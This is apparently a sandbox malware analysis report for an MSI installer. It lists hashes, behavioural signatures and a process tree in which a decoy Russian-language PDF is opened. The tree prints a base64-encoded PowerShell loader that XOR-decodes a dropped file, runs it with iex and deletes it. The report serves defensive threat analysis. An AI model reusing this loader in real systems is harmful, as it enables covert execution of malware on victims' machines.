4808815cb03b5f31841c74755897b65ed03e56dbddbe0d1fed06af3710f32d51

Analysis

max time kernel
142s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
12-04-2023 05:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fee3db5db8817e82b1af4cedafd2f346.msi
Size

166KB
MD5

fee3db5db8817e82b1af4cedafd2f346
SHA1

e6bcf68c7d55fc933e7a7e2ca1fb4e8fa1ad376d
SHA256

4808815cb03b5f31841c74755897b65ed03e56dbddbe0d1fed06af3710f32d51
SHA512

37bbe3176b6d793b2b140e6bb6989b322832bdd77869d86e071e7566902fa9f718a647c2fb347a8a79f1fd9b5d5fc376ba8ddfa516944c3134d351048853278c
SSDEEP

3072:cCZXtgABNBJ1BP5mUopW5KfTl6bmneDhZd31JHtb/B9:cedgABj3op+KrcrtZd31Ftb/B9

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
50	660	powershell.exe
54	660	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\Installer\SourceHash{E6F1D7A2-1AB6-4BE8-9892-4BFC2A3950AD}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE0A1.tmp	msiexec.exe
File created	C:\Windows\Installer\e56df3c.msi	msiexec.exe
File created	C:\Windows\Installer\e56df39.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e56df39.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000008ccb747e6bc781e30000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800008ccb747e0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809008ccb747e000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000008ccb747e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000008ccb747e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
1680	msiexec.exe
1680	msiexec.exe
4252	powershell.exe
4252	powershell.exe
660	powershell.exe
660	powershell.exe
660	powershell.exe
660	powershell.exe
660	powershell.exe
660	powershell.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4616	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4616	msiexec.exe
Token: SeSecurityPrivilege	1680	msiexec.exe
Token: SeCreateTokenPrivilege	4616	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4616	msiexec.exe
Token: SeLockMemoryPrivilege	4616	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4616	msiexec.exe
Token: SeMachineAccountPrivilege	4616	msiexec.exe
Token: SeTcbPrivilege	4616	msiexec.exe
Token: SeSecurityPrivilege	4616	msiexec.exe
Token: SeTakeOwnershipPrivilege	4616	msiexec.exe
Token: SeLoadDriverPrivilege	4616	msiexec.exe
Token: SeSystemProfilePrivilege	4616	msiexec.exe
Token: SeSystemtimePrivilege	4616	msiexec.exe
Token: SeProfSingleProcessPrivilege	4616	msiexec.exe
Token: SeIncBasePriorityPrivilege	4616	msiexec.exe
Token: SeCreatePagefilePrivilege	4616	msiexec.exe
Token: SeCreatePermanentPrivilege	4616	msiexec.exe
Token: SeBackupPrivilege	4616	msiexec.exe
Token: SeRestorePrivilege	4616	msiexec.exe
Token: SeShutdownPrivilege	4616	msiexec.exe
Token: SeDebugPrivilege	4616	msiexec.exe
Token: SeAuditPrivilege	4616	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4616	msiexec.exe
Token: SeChangeNotifyPrivilege	4616	msiexec.exe
Token: SeRemoteShutdownPrivilege	4616	msiexec.exe
Token: SeUndockPrivilege	4616	msiexec.exe
Token: SeSyncAgentPrivilege	4616	msiexec.exe
Token: SeEnableDelegationPrivilege	4616	msiexec.exe
Token: SeManageVolumePrivilege	4616	msiexec.exe
Token: SeImpersonatePrivilege	4616	msiexec.exe
Token: SeCreateGlobalPrivilege	4616	msiexec.exe
Token: SeBackupPrivilege	4700	vssvc.exe
Token: SeRestorePrivilege	4700	vssvc.exe
Token: SeAuditPrivilege	4700	vssvc.exe
Token: SeBackupPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe
Token: SeTakeOwnershipPrivilege	1680	msiexec.exe
Token: SeRestorePrivilege	1680	msiexec.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4616	msiexec.exe
4616	msiexec.exe
2684	AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe
2684	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1680 wrote to memory of 3860	1680	msiexec.exe	94
PID 1680 wrote to memory of 3860	1680	msiexec.exe	94
PID 1680 wrote to memory of 3328	1680	msiexec.exe	96
PID 1680 wrote to memory of 3328	1680	msiexec.exe	96
PID 1680 wrote to memory of 3328	1680	msiexec.exe	96
PID 3328 wrote to memory of 4252	3328	MsiExec.exe	97
PID 3328 wrote to memory of 4252	3328	MsiExec.exe	97
PID 3328 wrote to memory of 4252	3328	MsiExec.exe	97
PID 4252 wrote to memory of 2684	4252	powershell.exe	99
PID 4252 wrote to memory of 2684	4252	powershell.exe	99
PID 4252 wrote to memory of 2684	4252	powershell.exe	99
PID 4252 wrote to memory of 3212	4252	powershell.exe	100
PID 4252 wrote to memory of 3212	4252	powershell.exe	100
PID 4252 wrote to memory of 3212	4252	powershell.exe	100
PID 3212 wrote to memory of 4968	3212	csc.exe	101
PID 3212 wrote to memory of 4968	3212	csc.exe	101
PID 3212 wrote to memory of 4968	3212	csc.exe	101
PID 4252 wrote to memory of 540	4252	powershell.exe	102
PID 4252 wrote to memory of 540	4252	powershell.exe	102
PID 4252 wrote to memory of 540	4252	powershell.exe	102
PID 4252 wrote to memory of 4376	4252	powershell.exe	103
PID 4252 wrote to memory of 4376	4252	powershell.exe	103
PID 4252 wrote to memory of 4376	4252	powershell.exe	103
PID 1744 wrote to memory of 660	1744	wscript.exe	105
PID 1744 wrote to memory of 660	1744	wscript.exe	105
PID 660 wrote to memory of 4624	660	powershell.exe	107
PID 660 wrote to memory of 4624	660	powershell.exe	107
PID 4624 wrote to memory of 3804	4624	csc.exe	108
PID 4624 wrote to memory of 3804	4624	csc.exe	108
PID 2684 wrote to memory of 964	2684	AcroRd32.exe	109
PID 2684 wrote to memory of 964	2684	AcroRd32.exe	109
PID 2684 wrote to memory of 964	2684	AcroRd32.exe	109
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110
PID 964 wrote to memory of 3952	964	RdrCEF.exe	110

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\fee3db5db8817e82b1af4cedafd2f346.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4616

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1680
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:3860
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 5DF81F4BCD48C0E81FF85900AAEE8BF0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3328
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABpAG4AcwB0AD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAFcAaQBuAEUAdgBlAG4AdABDAG8AbQBcAHMAZQByAHYAaQBjAGUAXwBwAGEAYwBrAC4AZABhAHQAIgA7AGkAZgAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAaQBuAHMAdAApACkAewByAGUAdAB1AHIAbgA7AH0AJABiAGkAbgBzAHQAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAEIAeQB0AGUAcwAoACQAaQBuAHMAdAApADsAJAB4AGIAaQBuAHMAdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABCAHkAdABlAFsAXQAgACQAYgBpAG4AcwB0AC4AQwBvAHUAbgB0ADsAZgBvAHIAKAAkAGkAPQAwADsAJABpAC0AbAB0ACQAYgBpAG4AcwB0AC4AQwBvAHUAbgB0ADsAJABpACsAKwApAHsAJAB4AGIAaQBuAHMAdABbACQAaQBdAD0AJABiAGkAbgBzAHQAWwAkAGkAXQAtAGIAeABvAHIAMAB4ADEAMwA7ACQAeABiAGkAbgBzAHQAWwAkAGkAXQA9ACQAYgBpAG4AcwB0AFsAJABpAF0ALQBiAHgAbwByADAAeAA1ADUAOwAkAHgAYgBpAG4AcwB0AFsAJABpAF0APQAkAGIAaQBuAHMAdABbACQAaQBdAC0AYgB4AG8AcgAwAHgARgBGADsAJAB4AGIAaQBuAHMAdABbACQAaQBdAD0AJABiAGkAbgBzAHQAWwAkAGkAXQAtAGIAeABvAHIAMAB4AEYARgA7AH0AOwBUAHIAeQB7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4AGIAaQBuAHMAdAApAHwAaQBlAHgAOwB9AEMAYQB0AGMAaAB7AH0AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABpAG4AcwB0ACAALQBGAG8AcgBjAGUACgA=
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4252
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Приказ Минфина ДНР № 176.pdf"
      4⤵
      Checks processor information in registry
      Modifies Internet Explorer settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2684
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:964
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7888332A2636424E0426BA61A18020A9 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:3952
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9391A367F064B608A7884EED3159A6D2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9391A367F064B608A7884EED3159A6D2 --renderer-client-id=2 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:3656
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D3ABF3F8555F4711E378A76DECA4BF99 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:4616
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E03CCE17EC5E04608F74430A9B60832E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E03CCE17EC5E04608F74430A9B60832E --renderer-client-id=5 --mojo-platform-channel-handle=1952 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:4416
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=22C402E5233CBDC2E49DD36D5EBAD316 --mojo-platform-channel-handle=2444 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:1052
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
